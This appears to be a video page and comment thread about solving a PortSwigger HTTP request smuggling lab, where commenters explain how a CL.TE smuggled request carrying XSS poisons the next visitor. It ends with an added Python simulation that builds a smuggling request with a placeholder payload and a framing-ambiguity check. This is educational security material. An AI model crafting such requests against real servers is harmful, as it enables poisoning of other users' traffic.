Hey everyone! Check out this playlist for all my solutions to the HTTP Request Smuggling labs from PortSwigger - 👀
th-cam.com/play/PLGb2cDlBWRUX1_7RAIjRkZDYgAB3VbUSw.html
Here are the timestamps for this video - ⏱
00:00 - Intro
00:29 - Confirm the Reflected XSS vulnerability
02:11 - Detect the CL.TE vulnerability
03:53 - Confirm the CL.TE vulnerability
05:00 - Solve the lab
Love your work brother
Love from Nepal
Why are we able to do a GET request with a body on the smuggled request? When I tried to do a normal request with a body it got a 403 Forbidden error.
Why can't I find the vulnerability by sending a second normal request instead of refreshing the page?
I still don't get how it's delivered to the victim.
When you send the first request, the front-end sends the entire body of the two requests combined as one to the back-end, and that is why the first hit gives you a 200 OK. But keep in mind this request also contains the smuggled request... in short, this is the reason we let Burp update the Content-Length on its own...
Now imagine what happens in the back-end server when it receives this. First, it sees the chunk of zero and takes it as the end of the first request, hence 200 OK, but then it reads the second smuggled request, which is poisoned in the Agent header by the XSS script. This means that after the first request, which is not poisoned since the zero chunk terminated it, the second request will be poisoned by the payload. So everyone that visits the particular blog post right after we send our first request, the back-end server will serve them with the second smuggled request.
This is the whole idea of why it's working. Cheers!
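The mechanism the comment above describes, as an added example that is not from the video or from any commenter: a Python simulation of the front-end consuming the body by Content-Length while the back-end consumes it as chunked, so the same bytes become one request on one side and one-and-a-bit requests on the other, plus the framing-ambiguity check a front-end should apply to refuse such a message. The request bytes, the hostname and the `smuggled-marker` header value are constructed placeholders (the lab puts its script where the marker sits).

```python
# Constructed request (not from the page): both framing headers present,
# a zero-size chunk, then a partial second request with no terminating CRLF CRLF.
SMUGGLED_PREFIX = (
    b"GET /post?postId=1 HTTP/1.1\r\n"
    b"User-Agent: smuggled-marker\r\n"   # placeholder; the lab uses a script here
    b"X: "                                # unfinished header swallows the next request line
)
BODY = b"0\r\n\r\n" + SMUGGLED_PREFIX
REQUEST = (
    b"POST / HTTP/1.1\r\n"
    b"Host: example.invalid\r\n"
    b"Content-Length: " + str(len(BODY)).encode() + b"\r\n"  # "let Burp update it"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n" + BODY
)

def split_headers(raw):
    """Return (lower-cased header dict, body bytes) for one HTTP/1.1 message."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return headers, body

def body_by_content_length(raw):
    """Front-end view: forward exactly Content-Length body bytes as ONE request."""
    headers, body = split_headers(raw)
    return body[: int(headers[b"content-length"])]

def body_by_chunked(raw):
    """Back-end view: read chunks up to the zero-size chunk; any bytes left on
    the connection are parsed as the START of the next request."""
    _, body = split_headers(raw)
    decoded, pos = b"", 0
    while True:
        line_end = body.index(b"\r\n", pos)
        size = int(body[pos:line_end], 16)
        pos = line_end + 2
        if size == 0:
            pos = body.index(b"\r\n", pos) + 2   # skip the empty trailer line
            return decoded, body[pos:]
        decoded += body[pos:pos + size]
        pos += size + 2                         # chunk data plus its CRLF

def is_ambiguous_framing(raw):
    """Mitigation check: both Content-Length and Transfer-Encoding present means
    the two parsers can disagree; a front-end should reject (400) or normalise."""
    headers, _ = split_headers(raw)
    return b"content-length" in headers and b"transfer-encoding" in headers
```

Feeding `SMUGGLED_PREFIX` followed by a victim's own request line into `split_headers` shows the victim's request line landing in the dangling `X:` header while the smuggled `User-Agent` value stays in force.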